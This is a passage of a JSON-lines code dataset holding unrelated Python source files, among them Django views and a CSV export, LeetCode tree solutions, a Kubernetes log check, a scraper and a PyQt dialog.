response):\n req = MaoyanRequestItem()\n # 初始化获得本地时间\n req_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n try:\n # 将返回数据loads成字典\n items = json.loads(response.text).get('data').get('movie')\n if req_time > items['rt']:\n req['movie_id'] = items['id']\n req['movie_name'] = items['nm']\n req['request_date'] = datetime.datetime.now()\n req['create_date'] = datetime.datetime.now()\n if '中国' in items['src']:\n req['region'] = 'china'\n else:\n req['region'] = 'foreign'\n yield req\n except Exception as e:\n logging.error(e)\n\n","repo_name":"jaydenjd/film-spider","sub_path":"gerapy/projects/film_crawl/film_crawl/spiders/maoyanMovieHot.py","file_name":"maoyanMovieHot.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"4033492890","text":"from collections import OrderedDict\n\nfrom rest_framework.pagination import LimitOffsetPagination as _LimitOffsetPagination\nfrom rest_framework.response import Response\n\n\ndef get_paginated_response(*, pagination_class, serializer_class, queryset, request, view):\n paginator = pagination_class()\n\n page = paginator.paginate_queryset(queryset, request, view=view)\n\n if page is not None:\n serializer = serializer_class(page, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n serializer = serializer_class(queryset, many=True)\n\n return Response(data=serializer.data)\n\n\nclass LimitOffsetPagination(_LimitOffsetPagination):\n default_limit = 10\n max_limit = 50\n\n def get_paginated_data(self, data):\n return OrderedDict(\n [\n (\"limit\", self.limit),\n (\"offset\", self.offset),\n (\"count\", self.count),\n (\"next\", self.get_next_link()),\n (\"previous\", self.get_previous_link()),\n (\"results\", data),\n ]\n )\n\n def get_paginated_response(self, data):\n \"\"\"\n We redefine this method in order to return 
`limit` and `offset`.\n This is used by the frontend to construct the pagination itself.\n \"\"\"\n return Response(\n OrderedDict(\n [\n (\"limit\", self.limit),\n (\"offset\", self.offset),\n (\"count\", self.count),\n (\"next\", self.get_next_link()),\n (\"previous\", self.get_previous_link()),\n (\"results\", data),\n ]\n )\n )\n","repo_name":"HackSoftware/Django-Styleguide-Example","sub_path":"styleguide_example/api/pagination.py","file_name":"pagination.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":511,"dataset":"github-code","pt":"78"} +{"seq_id":"22962624772","text":"\"\"\"\nhttps://leetcode.com/problems/sum-of-root-to-leaf-binary-numbers/\n\nYou are given the root of a binary tree where each \nnode has a value 0 or 1. Each root-to-leaf path \nrepresents a binary number starting with the most \nsignificant bit.\n\nFor example, if the path is 0 -> 1 -> 1 -> 0 -> 1, \nthen this could represent 01101 in binary, which is 13.\nFor all leaves in the tree, consider the numbers \nrepresented by the path from the root to that leaf. \nReturn the sum of these numbers.\n\nThe test cases are generated so that the answer fits \nin a 32-bits integer.\n\nExample 1:\nInput: root = [1,0,1,0,1,0,1]\nOutput: 22\nExplanation: (100) + (101) + (110) + (111) = 4 + 5 + 6 + 7 = 22\n\nExample 2:\nInput: root = [0]\nOutput: 0\n\nConstraints:\nThe number of nodes in the tree is in the range [1, 1000].\nNode.val is 0 or 1.\n\"\"\"\nfrom collections import deque\nimport sys\n\nsys.path.insert(1, \"./\")\n\nfrom tree_node import (\n TreeNode,\n list_traversal_to_bt,\n print_tree,\n)\n\n\ndef dfs_recursion(root: TreeNode) -> int:\n # Depth First Search - Recursion\n # Time complexity: O(n)\n # Space complexity: O(h)\n\n def dfs(node: TreeNode, curr_val: int) -> int:\n # Base case: not a node, and the previous\n # node was not a leaf (only one child),\n # so don't take it into account for the total sum\n if not node:\n return 0\n\n # Update the passed current value\n # curr_val = curr_val << 1 | node.val\n curr_val = curr_val * 2 + node.data\n\n # If the current `node` is a leaf,\n # return `curr_value`\n # (which includes the update with the current `node`)\n if not node.left and not node.right:\n return curr_val\n\n # Continue exploring both branches\n return dfs(node.left, curr_val) + dfs(node.right, curr_val)\n\n return dfs(root, 0)\n\n\ndef dfs_iterative(root: TreeNode) -> int:\n # Depth First Search - Iterative\n # Time complexity: O(n)\n # Space complexity: O(h)\n\n res = 0\n # Explore the nodes of the tree using a stack\n # of tuples: (current_value, node)\n stack = deque([(root.data, root)])\n while stack:\n curr_val, node = stack.pop()\n\n if not node.left and not node.right:\n # If leaf node, add the number to the total sum\n res += curr_val\n\n # Update the current value\n curr_val <<= 1\n\n if node.left:\n stack.append((curr_val | node.left.data, node.left))\n\n if node.right:\n stack.append((curr_val | node.right.data, node.right))\n\n return res\n\n\ndef dfs_iterative2(root: TreeNode) -> int:\n # Depth First Search - Iterative\n # Time complexity: O(n)\n # Space complexity: O(h)\n\n res = 0\n # Explore the nodes of the tree using a stack\n # of tuples: (current_value, node)\n stack = deque([(0, root)])\n while stack:\n curr_val, node = stack.pop()\n\n # Update the current sum with the current node\n # curr_val = curr_val << 1 | node.data\n curr_val = curr_val * 2 + node.data\n\n if not node.left and not node.right:\n # If leaf node, add the 
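# Editor's note -- a sketch of how the helpers above are typically wired into a DRF
# view; UserListSerializer and User are hypothetical placeholders, not part of this
# record, so this snippet needs a configured Django project to actually run.
from rest_framework.views import APIView

class UserListApi(APIView):
    class Pagination(LimitOffsetPagination):  # the subclass defined above
        default_limit = 5

    def get(self, request):
        return get_paginated_response(
            pagination_class=self.Pagination,
            serializer_class=UserListSerializer,   # hypothetical serializer
            queryset=User.objects.order_by("id"),  # hypothetical model
            request=request,
            view=self,
        )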
number to the total sum\n res += curr_val\n\n if node.left:\n stack.append((curr_val, node.left))\n\n if node.right:\n stack.append((curr_val, node.right))\n\n return res\n\n\nif __name__ == \"__main__\":\n print(\"-\" * 60)\n print(\"Sum of root to leaf binary numbers\")\n print(\"-\" * 60)\n\n test_cases = [\n ([0], 0),\n ([1], 1),\n ([1, 0], 2),\n ([1, 0, 0], 4),\n ([1, 0, 1], 5),\n ([1, 0, 1, 0, 1, 0, 1], 22),\n ]\n\n for nums, solution in test_cases:\n\n root = list_traversal_to_bt(nums)\n print(\"Binary Tree:\")\n print_tree(root)\n\n result = dfs_recursion(root)\n output = f\" dfs_recursion = \"\n output += \" \" * (10 - len(output))\n test_ok = solution == result\n output += str(result)\n output += \" \" * (45 - len(output))\n output += f'\\t\\tTest: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n result = dfs_iterative(root)\n output = f\" dfs_iterative = \"\n output += \" \" * (10 - len(output))\n test_ok = solution == result\n output += str(result)\n output += \" \" * (45 - len(output))\n output += f'\\t\\tTest: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n result = dfs_iterative2(root)\n output = f\" dfs_iterative2 = \"\n output += \" \" * (10 - len(output))\n test_ok = solution == result\n output += str(result)\n output += \" \" * (45 - len(output))\n output += f'\\t\\tTest: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n print()\n","repo_name":"daalgi/algorithms","sub_path":"trees/sum_root_to_leaf_bin.py","file_name":"sum_root_to_leaf_bin.py","file_ext":"py","file_size_in_byte":4709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"2863493667","text":"import re\n\nfrom fossor.checks.check import Check\n\nclass CellStyleExceed(Check):\n def run(self, variables):\n out, err, return_code = self.shell_call('kubectl get pods')\n log_since = variables.get('log_since', None)\n pods = out.splitlines()[1:]\n serverLine = [pod for pod in pods if \"guandata-server\" in pod and \"Running\" in pod][0]\n serverPod = serverLine.split()[0]\n\n if (log_since):\n out, err, return_code = self.shell_call('kubectl logs --since=%s %s' % (log_since, serverPod))\n if (err):\n return err\n else:\n out, err, return_code = self.shell_call('kubectl logs --since=24h %s' % (serverPod))\n\n pattern = re.compile(r'(.*?)The maximum number of Cell Styles was exceeded. 
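# Note on the sum_root_to_leaf_bin.py sample above (seq_id 22962624772): its three
# solutions import TreeNode, list_traversal_to_bt and print_tree from a local
# tree_node module that is not included in the record. A minimal sketch of
# compatible helpers, assuming the input list is a level-order traversal with None
# for missing children; the names and the .data attribute mirror the sample's
# usage and are not a published API.
from collections import deque
from typing import List, Optional


class TreeNode:
    def __init__(self, data: int):
        self.data = data  # the sample reads node.data rather than node.val
        self.left: Optional["TreeNode"] = None
        self.right: Optional["TreeNode"] = None


def list_traversal_to_bt(values: List[Optional[int]]) -> Optional[TreeNode]:
    # Build a binary tree from a level-order list such as [1, 0, 1, 0, 1, 0, 1].
    if not values:
        return None
    root = TreeNode(values[0])
    queue = deque([root])
    i = 1
    while queue and i < len(values):
        node = queue.popleft()
        if values[i] is not None:
            node.left = TreeNode(values[i])
            queue.append(node.left)
        i += 1
        if i < len(values) and values[i] is not None:
            node.right = TreeNode(values[i])
            queue.append(node.right)
        i += 1
    return root


def print_tree(root: Optional[TreeNode]) -> None:
    # Tiny stand-in for the sample's pretty-printer: one list of values per level.
    level = [root] if root else []
    while level:
        print([n.data for n in level])
        level = [child for n in level for child in (n.left, n.right) if child]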
You can define up to 64000 style in a .xlsx Workbook(.*)', re.S|re.I)\n matchResult = re.match(pattern, ''.join(out))\n if matchResult != None:\n return \"可能是已知问题, 客户导出的cellStyle超过64000, 可参考Task-T5239\"\n return \"暂无该问题\"\n\nif __name__ == '__main__':\n c = CellStyleExceed()\n print(c.run({}))","repo_name":"Kaleidoscoper/fossor","sub_path":"fossor/checks/LogCheck/CellStyleExceed.py","file_name":"CellStyleExceed.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"34968124356","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom django.views.generic import TemplateView\nfrom django.http import JsonResponse\nfrom rura.models import ICT,InternationalInternetBandwidth,VoiceTraffic\nfrom datetime import datetime\n# Create your views here.\nclass HomePageView(TemplateView):\n template_name = \"home.html\"\n def getICTReport(self,request):\n #def get(self):\n ict = ICT.objects.all()\n vt =VoiceTraffic.objects.all()\n args ={'ict':ict,'vt':vt}\n return render(self.template_name,args)\n \ndef homePageView(request):\n template_name = \"home.html\"\n icts = ICT.objects.all()\n vt =VoiceTraffic.objects.all()\n args ={'icts':icts,'vts':vt}\n\n return render(request, template_name,args)\n\ndef getBarChatData(request):\n template_name = \"home.html\"\n ict = ICT.objects.all()\n vt =VoiceTraffic.objects.all()\n iternationalIB = InternationalInternetBandwidth.objects.all()\n dt = {\n \"data\":[len(ict),len(vt),len(iternationalIB)],\n \"labels\":[\"ICT \",\"voice Traffic\",\"Intl Bandwidth\"]\n }\n return JsonResponse(dt)\n\ndef getICT(request):\n icts = ICT.objects.all()\n vals= []\n labs =[]\n for ict in icts: \n vals.append(ict.prepaid)\n labs.append(datetime.date(ict.date_paid))\n \n dt={\n \"data\":vals,\n \"labels\":labs\n }\n return JsonResponse(dt)","repo_name":"pius-ng3a/rura","sub_path":"rura/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42431236214","text":"import requests\nfrom requests.compat import quote_plus\nfrom bs4 import BeautifulSoup\nfrom django.shortcuts import render\nfrom . 
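# Note on the CellStyleExceed.py sample above (seq_id 2863493667): it compiles
# r'(.*?)...(.*)' with re.S and runs re.match over ''.join(out), which (when out
# is already a string) is an indirect way of asking "does this message occur
# anywhere in the log?". re.search expresses that intent directly, and escaping
# the literal dots avoids accidental wildcard matches. A sketch of the
# equivalent test:
import re

CELL_STYLE_MSG = re.compile(
    r"The maximum number of Cell Styles was exceeded\."
    r" You can define up to 64000 style in a \.xlsx Workbook",
    re.IGNORECASE,
)


def has_cell_style_error(log_text: str) -> bool:
    # re.search scans the whole text, so no '(.*?)' prefix or re.S flag is needed.
    return CELL_STYLE_MSG.search(log_text) is not None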
import models\nfrom django.utils import timezone\n\nBASE_CRAIGLIST = 'https://sfbay.craigslist.org/search/bbb?query={}'\nBASSE_IMG_URL = 'https://images.craigslist.org/{}_300x300.jpg'\n\n# Create your views here.\ndef home(request):\n return render(request, 'base.html')\n\n\ndef new_search(request):\n search = request.POST.get('search')\n\n if search == None or len(search) == 0:\n \treturn render(request, 'myapp/new_search.html')\n\n create_search(search)\n\n final_url = BASE_CRAIGLIST.format(quote_plus(search))\n responce = requests.get(final_url)\n\n soup = BeautifulSoup(responce.text, features='html.parser')\n\n posts_list = soup.find_all('li', {'class' : 'result-row'})\n final_post = []\n\n for post in posts_list:\n \tpost_title = post.find(class_='result-title').text\n \tpost_url = post.find('a').get('href')\n\n \tpost_img_id = ''\n \tpost_img_url = ''\n\n \tif post.find(class_='result-image').get('data-ids'):\n \t\tpost_img_id = post.find(class_='result-image').get('data-ids').split(',')[0].split(':')[1]\n \t\tpost_img_url = BASSE_IMG_URL.format(post_img_id)\n\n \tfinal_post.append((post_title, post_url, post_img_url))\n\n stuff_for_frontend = {\n \t'search': search,\n \t'final_post': final_post,\n \t}\n return render(request, 'myapp/new_search.html', stuff_for_frontend)\n\ndef create_search(search):\n\tmodels.Search.objects.create(search=search, created=timezone.now())","repo_name":"aleksandr254/myapp","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74906711931","text":"import csv\nimport torch\nimport argparse\nimport pandas as pd\nimport webdataset as wds\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\n \"-p\",\n \"--dataset_path\",\n type=str,\n help=\"Path to the directory of the dataset in the format: e.g: http://storage.googleapis.com/nvdata-openimages/openimages-train-{000000..000554}.tar\"\n)\n\nparser.add_argument(\n \"-n\",\n \"--dataset_name\",\n type=str\n)\n\nargs = parser.parse_args()\n\ndataset = wds.WebDataset(args.dataset_path)\ndataloader = torch.utils.data.DataLoader(dataset, num_workers=4, batch_size=1)\n\nwith open(args.dataset_name+'.tsv', 'w',encoding='UTF8') as f:\n print(':)')\n writer = csv.writer(f,delimiter='\\t')\n for data in dataloader:\n writer.writerow([data['caption_reference_description.txt'][0].decode(\"utf-8\"),data['image_url.txt'][0].decode(\"utf-8\")])\n","repo_name":"hiaac-nlp/CAPIVARA","sub_path":"preprocessing/dataset_to_tsv.py","file_name":"dataset_to_tsv.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"23161399634","text":"# -*- coding: utf-8 -*-\n# This file is part of Acca plugin.\n\n# Acca plugin is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n\n# Acca plugin is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with Acca plugin. 
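# Note on the dataset_to_tsv.py sample above (seq_id 74906711931): per the csv
# module docs, files passed to csv.writer should be opened with newline='' so the
# writer controls line endings itself (otherwise Windows inserts blank rows).
# A sketch of the write loop with that fix; the (caption, url) byte fields follow
# the record's WebDataset keys and are assumptions about that dataset's layout:
import csv


def write_rows(rows, path):
    # rows: iterable of (caption_bytes, url_bytes) pairs as yielded by the loader.
    with open(path, "w", encoding="utf-8", newline="") as f:
        writer = csv.writer(f, delimiter="\t")
        for caption, url in rows:
            # Decode the raw bytes once; csv handles quoting of embedded tabs.
            writer.writerow([caption.decode("utf-8"), url.decode("utf-8")])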
If not, see .\n\n\n# Form implementation generated from reading ui file 'progress_form.ui'\n#\n# Created: Fri Apr 27 19:11:35 2012\n# by: PyQt4 UI code generator 4.7.3\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt4 import QtCore, QtGui\n\nclass Ui_progress_dialog(object):\n def setupUi(self, progress_dialog):\n progress_dialog.setObjectName(\"progress_dialog\")\n progress_dialog.resize(520, 98)\n self.verticalLayoutWidget = QtGui.QWidget(progress_dialog)\n self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 10, 501, 81))\n self.verticalLayoutWidget.setObjectName(\"verticalLayoutWidget\")\n self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.gridLayout = QtGui.QGridLayout()\n self.gridLayout.setObjectName(\"gridLayout\")\n self.lblStatus = QtGui.QLabel(self.verticalLayoutWidget)\n sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Maximum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.lblStatus.sizePolicy().hasHeightForWidth())\n self.lblStatus.setSizePolicy(sizePolicy)\n self.lblStatus.setAlignment(QtCore.Qt.AlignCenter)\n self.lblStatus.setObjectName(\"lblStatus\")\n self.gridLayout.addWidget(self.lblStatus, 0, 1, 1, 1)\n self.prBar = QtGui.QProgressBar(self.verticalLayoutWidget)\n self.prBar.setProperty(\"value\", 0)\n self.prBar.setObjectName(\"prBar\")\n self.gridLayout.addWidget(self.prBar, 1, 0, 1, 3)\n self.verticalLayout.addLayout(self.gridLayout)\n\n self.retranslateUi(progress_dialog)\n QtCore.QMetaObject.connectSlotsByName(progress_dialog)\n\n def retranslateUi(self, progress_dialog):\n progress_dialog.setWindowTitle(QtGui.QApplication.translate(\"progress_dialog\", \"Progress\", None, QtGui.QApplication.UnicodeUTF8))\n self.lblStatus.setText(QtGui.QApplication.translate(\"progress_dialog\", \"Progress\", None, QtGui.QApplication.UnicodeUTF8))\n\n","repo_name":"bastrakov-sergei/Acca_Plugin","sub_path":"progress_form.py","file_name":"progress_form.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"12152558561","text":"import requests\nimport os\nimport mimetypes\n\nAPI_KEY = os.getenv('BGREM_KEY')\nURL = 'https://bgrem.deelvin.com/api/v1'\n\ndef upload_videos(fp, back_id=None):\n action = 'videos'\n with open(fp, \"rb\") as f:\n files = {\"file\": (os.path.basename(fp), f, mimetypes.MimeTypes().guess_type(fp)[0])}\n headers = {'Authorization': f'Bearer {API_KEY}'}\n data = {\n 'background_id': back_id,\n }\n r = requests.post(f'{URL}/{action}', headers=headers, files=files, data=data)\n return r.json()['id']\n\n\ndef get_video_by_id(id):\n action = 'videos'\n r = requests.get(f'{URL}/{action}/{id}', headers={'Authorization': f'Bearer {API_KEY}'})\n return r.json()\n\n\ndef delete_video_by_id(id):\n action = 'videos'\n r = requests.delete(f'{URL}/{action}/{id}', headers={'Authorization': f'Bearer {API_KEY}'})\n return print(r.json())\n\n\ndef main():\n result_id = upload_videos('./john.mp4', back_id='8da750a2-1bf6-4867-bd16-81e16de710dd')\n status = ''\n while status != 'done':\n status = get_video_by_id(result_id)['status']\n if status == 'error':\n print('There was error while working with file!')\n return\n print(f'Result url is: {get_video_by_id(result_id)[\"result_url\"]}')\n delete_video_by_id(result_id)\n return\n\n\nif __name__ == '__main__':\n 
main()\n\n\n","repo_name":"EkaterinaT89/BgRem-1","sub_path":"API_demo/demo_proj/john_lost.py","file_name":"john_lost.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20673741560","text":"from __future__ import annotations\n\nimport csv\nimport itertools\nimport json\nfrom typing import Any, Dict, get_args\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.http.response import HttpResponse\nfrom django.shortcuts import get_object_or_404\nfrom django.views.generic import View\n\nfrom vdgsa_backend.conclave_registration.models import (\n AdditionalRegistrationInfo, ConclaveRegistrationConfig, Housing, Period, RegistrationEntry,\n WorkStudyApplication, YesNo\n)\nfrom vdgsa_backend.conclave_registration.summary_and_charges import (\n CHARGE_CSV_LABELS, get_charges_summary\n)\n\nfrom .permissions import is_conclave_team\n\n\nclass DownloadRegistrationEntriesCSVView(LoginRequiredMixin, UserPassesTestMixin, View):\n def get(self, *args: Any, **kwargs: Any) -> HttpResponse:\n return make_reg_csv(\n get_object_or_404(ConclaveRegistrationConfig, pk=self.kwargs['conclave_config_pk'])\n )\n\n def test_func(self) -> bool:\n return is_conclave_team(self.request.user)\n\n\ndef make_reg_csv(conclave_config: ConclaveRegistrationConfig) -> HttpResponse:\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = (\n f'attachment; filename=\"conclave_{conclave_config.year}_registration.csv\"')\n\n # IMPORTANT: Update CSV_HEADERS below if you\n # update the CSV dicts.\n writer = csv.DictWriter(response, fieldnames=CSV_HEADERS, extrasaction='ignore')\n writer.writeheader()\n\n entries = RegistrationEntry.objects.filter(\n conclave_config=conclave_config).order_by('payment_info__pk')\n for entry in entries:\n if not hasattr(entry, 'payment_info') or entry.payment_info.stripe_payment_method_id == '':\n continue\n\n row = {\n 'sequence_id': entry.payment_info.id,\n\n 'USER INFO': '',\n **user_info_to_dict(entry),\n\n 'program': entry.program,\n 'is_late': entry.is_late,\n 'stripe_payment_method_id': entry.payment_info.stripe_payment_method_id,\n\n 'INSTRUMENTS': '',\n **instruments_to_dict(entry),\n\n 'CLASSES': '',\n **classes_to_dict(entry),\n\n 'ADVANCED PROJECTS': '',\n **advanced_projects_to_dict(entry),\n\n 'WORK-STUDY': '',\n **work_study_to_dict(entry),\n\n 'HOUSING': '',\n **housing_to_dict(entry),\n\n 'EXTRAS': '',\n **extras_to_dict(entry),\n\n 'CHARGES': '',\n **charges_to_dict(entry),\n 'charges': json.dumps(get_charges_summary(entry), indent=4),\n }\n print(row)\n writer.writerow(row)\n\n return response\n\n\ndef user_info_to_dict(entry: RegistrationEntry) -> dict[str, object]:\n result: dict[str, object] = {\n 'email': entry.user.username,\n 'first_name': entry.user.first_name,\n 'last_name': entry.user.last_name,\n }\n\n if not hasattr(entry, 'additional_info'):\n return result\n\n info: AdditionalRegistrationInfo = entry.additional_info\n\n result.update({\n 'nickname': info.nickname,\n 'address_line_1': entry.user.address_line_1,\n 'address_line_2': entry.user.address_line_2,\n 'address_city': entry.user.address_city,\n 'address_state': entry.user.address_state,\n 'address_postal_code': entry.user.address_postal_code,\n 'address_country': entry.user.address_country,\n 'conclave_phone': entry.additional_info.phone,\n 'phone1': entry.user.phone1,\n 'phone2': entry.user.phone2,\n\n 'age': info.age,\n 'gender': info.gender,\n 
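# Note on the john_lost.py sample above (seq_id 12152558561): its main() polls
# get_video_by_id in a tight loop, hitting the API as fast as possible between
# status changes. A sketch of the same loop with a pause and a timeout; the delay
# and cap values are illustrative, not from the BgRem docs:
import time


def wait_until_done(get_status, poll_seconds=5, max_wait_seconds=600):
    # get_status: zero-argument callable returning a status string such as
    # 'done' or 'error' (other in-progress values are assumed possible).
    deadline = time.monotonic() + max_wait_seconds
    while time.monotonic() < deadline:
        status = get_status()
        if status == "done":
            return True
        if status == "error":
            return False
        time.sleep(poll_seconds)  # be polite between polls
    raise TimeoutError("gave up waiting for the video to finish processing")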
'pronouns': info.pronouns,\n\n 'include_in_whos_coming_to_conclave_list': info.include_in_whos_coming_to_conclave_list,\n 'attended_conclave_before': info.attended_conclave_before,\n 'buddy_willingness': info.buddy_willingness,\n 'wants_display_space': info.wants_display_space,\n 'num_display_space_days': (\n info.num_display_space_days if info.wants_display_space == YesNo.yes else 0\n ),\n 'liability_release': info.liability_release,\n 'covid_policy': info.covid_policy,\n 'photo_release_auth': info.photo_release_auth,\n 'other_info': info.other_info,\n })\n\n return result\n\n\ndef instruments_to_dict(entry: RegistrationEntry) -> Dict[str, Any]:\n instruments_str = ''\n for instr in entry.instruments_bringing.all():\n instruments_str += (\n str(instr) + f' | {instr.level} | {\",\".join(instr.clefs)} '\n f'| {instr.purpose} | {instr.comments}\\n'\n )\n\n result = {\n 'instruments_bringing': instruments_str,\n }\n if hasattr(entry, 'beginner_instruments'):\n result['beginner_needs_instrument'] = entry.beginner_instruments.needs_instrument\n result['beginner_instrument_bringing'] = entry.beginner_instruments.instrument_bringing\n\n return result\n\n\ndef classes_to_dict(entry: RegistrationEntry) -> dict[str, str]:\n if not hasattr(entry, 'regular_class_choices'):\n return {}\n\n class_prefs = entry.regular_class_choices\n result = {'comments': class_prefs.comments}\n\n # periodX_choiceY and periodX_choiceY_instrument fields\n for period in Period:\n for choice in range(1, 4):\n choice_attr = f'period{period}_choice{choice}'\n instr_attr = choice_attr + '_instrument'\n result[choice_attr] = getattr(class_prefs, choice_attr)\n result[instr_attr] = getattr(class_prefs, instr_attr)\n\n result.update({\n 'flex_choice1': class_prefs.flex_choice1,\n 'flex_choice1_instrument': class_prefs.flex_choice1_instrument,\n 'flex_choice2': class_prefs.flex_choice2,\n 'flex_choice2_instrument': class_prefs.flex_choice2_instrument,\n 'flex_choice3': class_prefs.flex_choice3,\n 'flex_choice3_instrument': class_prefs.flex_choice3_instrument,\n })\n\n return result\n\n\ndef advanced_projects_to_dict(entry: RegistrationEntry) -> Dict[str, str]:\n if not hasattr(entry, 'advanced_projects'):\n return {}\n\n return {\n 'participation': entry.advanced_projects.participation,\n 'project_proposal': entry.advanced_projects.project_proposal,\n }\n\n\ndef work_study_to_dict(entry: RegistrationEntry) -> Dict[str, str]:\n if not hasattr(entry, 'work_study'):\n return {}\n\n work_study: WorkStudyApplication = entry.work_study\n return {\n 'applying_for_work_study': work_study.wants_work_study,\n 'phone_number': work_study.phone_number,\n 'can_receive_texts_at_phone_number': work_study.can_receive_texts_at_phone_number,\n 'has_been_to_conclave': work_study.has_been_to_conclave,\n 'has_done_work_study': work_study.has_done_work_study,\n 'student_info': work_study.student_info,\n 'can_arrive_before_first_meeting': work_study.can_arrive_before_first_meeting,\n 'early_arrival': work_study.early_arrival,\n 'can_stay_until_sunday_afternoon': work_study.can_stay_until_sunday_afternoon,\n 'other_travel_info': work_study.other_travel_info,\n 'job_preferences': ','.join(work_study.job_preferences),\n 'other_jobs': work_study.other_jobs,\n 'has_car': work_study.has_car,\n 'relevant_job_experience': work_study.relevant_job_experience,\n 'other_skills': work_study.other_skills,\n 'other_info': work_study.other_info,\n }\n\n\ndef housing_to_dict(entry: RegistrationEntry) -> dict[str, object]:\n if not hasattr(entry, 'housing'):\n return 
{}\n\n housing: Housing = entry.housing\n\n return {\n 'room_type': housing.room_type,\n 'roommate_request': housing.roommate_request,\n 'room_near_person_request': housing.room_near_person_request,\n 'normal_bed_time': housing.normal_bed_time,\n 'arrival_day': housing.arrival_day,\n 'departure_day': housing.departure_day,\n 'wants_housing_subsidy': housing.wants_housing_subsidy,\n 'wants_2023_housing_subsidy': housing.wants_2023_supplemental_discount,\n 'wants_canadian_currency_exchange_discount': (\n housing.wants_canadian_currency_exchange_discount\n ),\n 'additional_housing_info': housing.additional_housing_info,\n 'dietary_needs': ','.join(housing.dietary_needs),\n 'other_dietary_needs': housing.other_dietary_needs,\n 'banquet_food_choice': housing.banquet_food_choice,\n 'is_bringing_guest_to_banquet': housing.is_bringing_guest_to_banquet,\n 'banquet_guest_name': housing.banquet_guest_name,\n 'banquet_guest_food_choice': housing.banquet_guest_food_choice,\n }\n\n\ndef extras_to_dict(entry: RegistrationEntry) -> dict[str, object]:\n if not hasattr(entry, 'tshirts'):\n return {}\n\n return {\n 'tshirt1': entry.tshirts.tshirt1,\n 'tshirt2': entry.tshirts.tshirt2,\n 'donation': entry.tshirts.donation,\n }\n\n\ndef charges_to_dict(entry: RegistrationEntry) -> dict[str, float]:\n charges_summary = get_charges_summary(entry)\n result = {\n **{label: '' for label in CHARGE_CSV_LABELS},\n 'Work Study Scholarship': charges_summary['work_study_scholarship_amount'],\n 'Housing Subsidy?': charges_summary['apply_housing_subsidy'],\n 'Housing 2023 Single Room Subsidy?': charges_summary['apply_2023_housing_subsidy'],\n 'Trust Discount?': charges_summary['apply_canadian_discount'],\n 'Subtotal': charges_summary['subtotal'],\n 'Total': charges_summary['total'],\n }\n\n for charge in charges_summary['charges']:\n result[charge['csv_label']] = charge['amount']\n\n return result\n\n\n# IMPORTANT: Update this list when you update the CSV dicts.\nCSV_HEADERS = [\n 'sequence_id',\n\n 'USER INFO',\n 'email',\n 'first_name',\n 'last_name',\n 'nickname',\n 'address_line_1',\n 'address_line_2',\n 'address_city',\n 'address_state',\n 'address_postal_code',\n 'address_country',\n 'conclave_phone',\n 'phone1',\n 'phone2',\n 'age',\n 'gender',\n 'pronouns',\n 'include_in_whos_coming_to_conclave_list',\n 'attended_conclave_before',\n 'buddy_willingness',\n 'wants_display_space',\n 'num_display_space_days',\n 'liability_release',\n 'covid_policy',\n 'photo_release_auth',\n 'other_info',\n\n 'program',\n 'is_late',\n 'stripe_payment_method_id',\n\n 'INSTRUMENTS',\n 'instruments_bringing',\n 'beginner_needs_instrument',\n 'beginner_instrument_bringing',\n\n 'CLASSES',\n 'comments',\n *list(itertools.chain.from_iterable(\n (f'period{period}_choice{choice}', f'period{period}_choice{choice}_instrument')\n for choice in range(1, 4)\n for period in Period\n )),\n 'flex_choice1',\n 'flex_choice1_instrument',\n 'flex_choice2',\n 'flex_choice2_instrument',\n 'flex_choice3',\n 'flex_choice3_instrument',\n\n 'ADVANCED PROJECTS',\n 'participation',\n 'project_proposal',\n\n 'WORK-STUDY',\n 'applying_for_work_study',\n 'phone_number',\n 'can_receive_texts_at_phone_number',\n 'has_been_to_conclave',\n 'has_done_work_study',\n 'student_info',\n 'can_arrive_before_first_meeting',\n 'early_arrival',\n 'can_stay_until_sunday_afternoon',\n 'other_travel_info',\n 'job_preferences',\n 'other_jobs',\n 'has_car',\n 'relevant_job_experience',\n 'other_skills',\n 'other_info',\n\n 'HOUSING',\n 'room_type',\n 'roommate_request',\n 
